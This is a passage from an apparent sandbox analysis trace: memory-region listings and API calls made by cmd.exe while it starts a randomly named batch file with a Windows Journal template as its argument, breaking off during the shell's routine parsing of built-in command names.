entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6098 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6099 start_va = 0x6e0000 end_va = 0x85ffff entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 6100 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6101 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6102 start_va = 0x460000 end_va = 0x46ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6103 start_va = 0x7f270000 end_va = 0x7f36ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f270000" filename = "" Region: id = 6544 start_va = 0x860000 end_va = 0x91dfff entry_point = 0x860000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6545 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6546 start_va = 0x620000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 6547 start_va = 0x920000 end_va = 0xa1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 6548 start_va = 0xa20000 end_va = 0xb3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 6549 start_va = 0x7f396000 end_va = 0x7f398fff entry_point = 0x0 region_type = private name = "private_0x000000007f396000" filename = "" Region: id = 6550 start_va = 0x470000 end_va = 0x473fff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6666 start_va = 0x480000 end_va = 0x483fff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 6696 start_va = 0x74540000 end_va = 0x74547fff entry_point = 0x74540000 region_type = mapped_file name = "cmdext.dll" filename = "\\Windows\\SysWOW64\\cmdext.dll" (normalized: "c:\\windows\\syswow64\\cmdext.dll") Region: id = 6697 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6698 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6699 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6700 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6701 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6702 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6703 start_va = 0x660000 end_va = 0x66ffff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 7198 start_va = 0xb40000 end_va = 0xe76fff entry_point = 0xb40000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 796 os_tid = 0xab0 [0264.729] GetModuleHandleA (lpModuleName=0x0) returned 0x13d0000 [0264.729] __set_app_type (_Type=0x1) [0264.729] __p__fmode () returned 0x77984d6c [0264.729] __p__commode () returned 0x77985b1c [0264.729] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13e36e0) returned 0x0 [0264.730] __getmainargs (in: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0, _DoWildCard=0, _StartInfo=0x13f50fc | out: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0) returned 0 [0264.730] GetCurrentThreadId () returned 0xab0 [0264.730] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xab0) returned 0x84 [0264.730] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0264.730] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadUILanguage") returned 0x75172780 [0264.730] SetThreadUILanguage (LangId=0x0) returned 0x409 [0264.745] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0264.746] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x5efd94 | out: phkResult=0x5efd94*=0x0) returned 0x2 [0264.746] VirtualQuery (in: lpAddress=0x5efd9b, lpBuffer=0x5efd4c, dwLength=0x1c | out: lpBuffer=0x5efd4c*(BaseAddress=0x5ef000, AllocationBase=0x4f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0264.746] VirtualQuery (in: lpAddress=0x4f0000, lpBuffer=0x5efd4c, dwLength=0x1c | out: lpBuffer=0x5efd4c*(BaseAddress=0x4f0000, AllocationBase=0x4f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0264.746] VirtualQuery (in: lpAddress=0x4f1000, lpBuffer=0x5efd4c, dwLength=0x1c | out: lpBuffer=0x5efd4c*(BaseAddress=0x4f1000, AllocationBase=0x4f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0264.746] VirtualQuery (in: lpAddress=0x4f3000, lpBuffer=0x5efd4c, dwLength=0x1c | out: lpBuffer=0x5efd4c*(BaseAddress=0x4f3000, AllocationBase=0x4f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0264.746] VirtualQuery (in: lpAddress=0x5f0000, lpBuffer=0x5efd4c, dwLength=0x1c | out: lpBuffer=0x5efd4c*(BaseAddress=0x5f0000, AllocationBase=0x5f0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0264.746] GetConsoleOutputCP () returned 0x1b5 [0264.767] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0264.767] SetConsoleCtrlHandler (HandlerRoutine=0x13ef980, Add=1) returned 1 [0264.767] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.767] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0264.771] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.771] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0264.772] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.772] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0264.774] _get_osfhandle (_FileHandle=0) returned 0x38 [0264.774] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0264.775] _get_osfhandle (_FileHandle=0) returned 0x38 [0264.775] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0264.776] GetEnvironmentStringsW () returned 0x767ea0* [0264.776] FreeEnvironmentStringsA (penv="A") returned 1 [0264.776] GetEnvironmentStringsW () returned 0x767ea0* [0264.777] FreeEnvironmentStringsA (penv="A") returned 1 [0264.777] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x5eecf8 | out: phkResult=0x5eecf8*=0x94) returned 0x0 [0264.777] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x5eecfc, lpData=0x5eed04, lpcbData=0x5eed00*=0x1000 | out: lpType=0x5eecfc*=0x0, lpData=0x5eed04*=0xdf, lpcbData=0x5eed00*=0x1000) returned 0x2 [0264.777] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x5eecfc, lpData=0x5eed04, lpcbData=0x5eed00*=0x1000 | out: lpType=0x5eecfc*=0x4, lpData=0x5eed04*=0x1, lpcbData=0x5eed00*=0x4) returned 0x0 [0264.777] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x5eecfc, lpData=0x5eed04, lpcbData=0x5eed00*=0x1000 | out: lpType=0x5eecfc*=0x0, lpData=0x5eed04*=0x1, lpcbData=0x5eed00*=0x1000) returned 0x2 [0264.777] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x5eecfc, lpData=0x5eed04, lpcbData=0x5eed00*=0x1000 | out: lpType=0x5eecfc*=0x4, lpData=0x5eed04*=0x0, lpcbData=0x5eed00*=0x4) returned 0x0 [0264.777] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x5eecfc, lpData=0x5eed04, lpcbData=0x5eed00*=0x1000 | out: lpType=0x5eecfc*=0x4, lpData=0x5eed04*=0x40, lpcbData=0x5eed00*=0x4) returned 0x0 [0264.777] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x5eecfc, lpData=0x5eed04, lpcbData=0x5eed00*=0x1000 | out: lpType=0x5eecfc*=0x4, lpData=0x5eed04*=0x40, lpcbData=0x5eed00*=0x4) returned 0x0 [0264.777] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x5eecfc, lpData=0x5eed04, lpcbData=0x5eed00*=0x1000 | out: lpType=0x5eecfc*=0x0, lpData=0x5eed04*=0x40, lpcbData=0x5eed00*=0x1000) returned 0x2 [0264.777] RegCloseKey (hKey=0x94) returned 0x0 [0264.777] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x5eecf8 | out: phkResult=0x5eecf8*=0x94) returned 0x0 [0264.777] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x5eecfc, lpData=0x5eed04, lpcbData=0x5eed00*=0x1000 | out: lpType=0x5eecfc*=0x0, lpData=0x5eed04*=0x40, lpcbData=0x5eed00*=0x1000) returned 0x2 [0264.777] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x5eecfc, lpData=0x5eed04, lpcbData=0x5eed00*=0x1000 | out: lpType=0x5eecfc*=0x4, lpData=0x5eed04*=0x1, lpcbData=0x5eed00*=0x4) returned 0x0 [0264.777] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x5eecfc, lpData=0x5eed04, lpcbData=0x5eed00*=0x1000 | out: lpType=0x5eecfc*=0x0, lpData=0x5eed04*=0x1, lpcbData=0x5eed00*=0x1000) returned 0x2 [0264.777] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x5eecfc, lpData=0x5eed04, lpcbData=0x5eed00*=0x1000 | out: lpType=0x5eecfc*=0x4, lpData=0x5eed04*=0x0, lpcbData=0x5eed00*=0x4) returned 0x0 [0264.777] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x5eecfc, lpData=0x5eed04, lpcbData=0x5eed00*=0x1000 | out: lpType=0x5eecfc*=0x4, lpData=0x5eed04*=0x9, lpcbData=0x5eed00*=0x4) returned 0x0 [0264.777] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x5eecfc, lpData=0x5eed04, lpcbData=0x5eed00*=0x1000 | out: lpType=0x5eecfc*=0x4, lpData=0x5eed04*=0x9, lpcbData=0x5eed00*=0x4) returned 0x0 [0264.777] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x5eecfc, lpData=0x5eed04, lpcbData=0x5eed00*=0x1000 | out: lpType=0x5eecfc*=0x0, lpData=0x5eed04*=0x9, lpcbData=0x5eed00*=0x1000) returned 0x2 [0264.777] RegCloseKey (hKey=0x94) returned 0x0 [0264.777] time (in: timer=0x0 | out: timer=0x0) returned 0x5bb43291 [0264.778] srand (_Seed=0x5bb43291) [0264.778] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\"\"" [0264.778] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\"\"" [0264.778] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0264.778] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x767ea8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0264.778] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0264.778] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0264.778] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0264.778] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0264.778] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0264.778] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0264.778] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0264.778] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0264.778] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0264.778] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0264.778] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0264.778] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0264.778] GetEnvironmentStringsW () returned 0x7680b8* [0264.779] FreeEnvironmentStringsA (penv="A") returned 1 [0264.779] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0264.779] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0264.779] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0264.779] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0264.779] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0264.779] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0264.779] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0264.779] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0264.779] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0264.779] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0264.779] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x5efad0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0264.779] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x5efad0, lpFilePart=0x5efac8 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x5efac8*="Desktop") returned 0x1d [0264.779] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0265.728] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x5ef850 | out: lpFindFileData=0x5ef850) returned 0x7605c8 [0265.728] FindClose (in: hFindFile=0x7605c8 | out: hFindFile=0x7605c8) returned 1 [0265.728] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x5ef850 | out: lpFindFileData=0x5ef850) returned 0x7605c8 [0265.728] FindClose (in: hFindFile=0x7605c8 | out: hFindFile=0x7605c8) returned 1 [0265.728] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0265.728] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x5ef850 | out: lpFindFileData=0x5ef850) returned 0x7605c8 [0265.728] FindClose (in: hFindFile=0x7605c8 | out: hFindFile=0x7605c8) returned 1 [0265.728] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0265.728] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0265.728] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0265.728] GetEnvironmentStringsW () returned 0x7680b8* [0265.728] FreeEnvironmentStringsA (penv="=") returned 1 [0265.728] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0265.729] GetConsoleOutputCP () returned 0x1b5 [0265.933] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0265.933] GetUserDefaultLCID () returned 0x409 [0265.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x14024a0, cchData=8 | out: lpLCData=":") returned 2 [0265.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x5efc00, cchData=128 | out: lpLCData="0") returned 2 [0265.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x5efc00, cchData=128 | out: lpLCData="0") returned 2 [0265.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x5efc00, cchData=128 | out: lpLCData="1") returned 2 [0265.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x14024b0, cchData=8 | out: lpLCData="/") returned 2 [0265.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x1402500, cchData=32 | out: lpLCData="Mon") returned 4 [0265.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x1402540, cchData=32 | out: lpLCData="Tue") returned 4 [0265.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x1402580, cchData=32 | out: lpLCData="Wed") returned 4 [0265.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x14025c0, cchData=32 | out: lpLCData="Thu") returned 4 [0265.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x1402600, cchData=32 | out: lpLCData="Fri") returned 4 [0265.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x1402640, cchData=32 | out: lpLCData="Sat") returned 4 [0265.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x1402680, cchData=32 | out: lpLCData="Sun") returned 4 [0265.933] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x14024c0, cchData=8 | out: lpLCData=".") returned 2 [0265.934] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x14024e0, cchData=8 | out: lpLCData=",") returned 2 [0265.934] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0265.935] GetConsoleTitleW (in: lpConsoleTitle=0x76a9a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0266.067] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0266.067] GetProcAddress (hModule=0x75130000, lpProcName="CopyFileExW") returned 0x7514fa80 [0266.067] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0266.067] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleInputExeNameW") returned 0x74e435c0 [0266.068] _wcsicmp (_String1="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"", _String2=")") returned -7 [0266.068] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 68 [0266.068] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 68 [0266.068] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 71 [0266.068] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 71 [0266.068] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 80 [0266.068] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 80 [0266.070] GetConsoleTitleW (in: lpConsoleTitle=0x5ef8e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0266.070] GetFileAttributesW (lpFileName="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\\"c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat\"")) returned 0xffffffff [0266.071] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0266.071] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0266.071] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0266.071] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0266.071] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0266.071] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0266.071] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0266.071] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0266.071] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0266.071] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0266.071] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0266.071] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0266.071] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0266.071] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0266.071] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0266.071] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0266.071] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0266.071] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0266.071] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0266.071] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0266.071] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0266.071] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0266.071] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0266.071] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0266.071] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0266.071] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0266.071] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0266.071] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0266.071] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0266.071] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0266.071] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0266.071] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0266.072] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0266.072] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0266.072] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0266.072] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0266.072] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0266.072] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0266.072] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0266.072] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0266.072] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0266.072] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0266.072] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0266.072] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0266.072] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0266.072] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0266.072] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0266.072] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0266.072] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0266.072] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0266.072] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0266.072] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0266.072] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0266.072] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0266.072] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0266.072] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0266.072] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0266.072] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0266.072] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0266.072] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0266.072] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0266.072] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0266.072] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0266.072] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0266.072] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0266.072] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0266.072] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0266.073] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0266.073] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0266.073] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0266.073] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0266.073] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0266.073] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0266.073] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0266.073] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0266.073] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0266.073] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0266.073] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0266.073] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0266.073] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0266.073] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0266.073] _wcsicmp 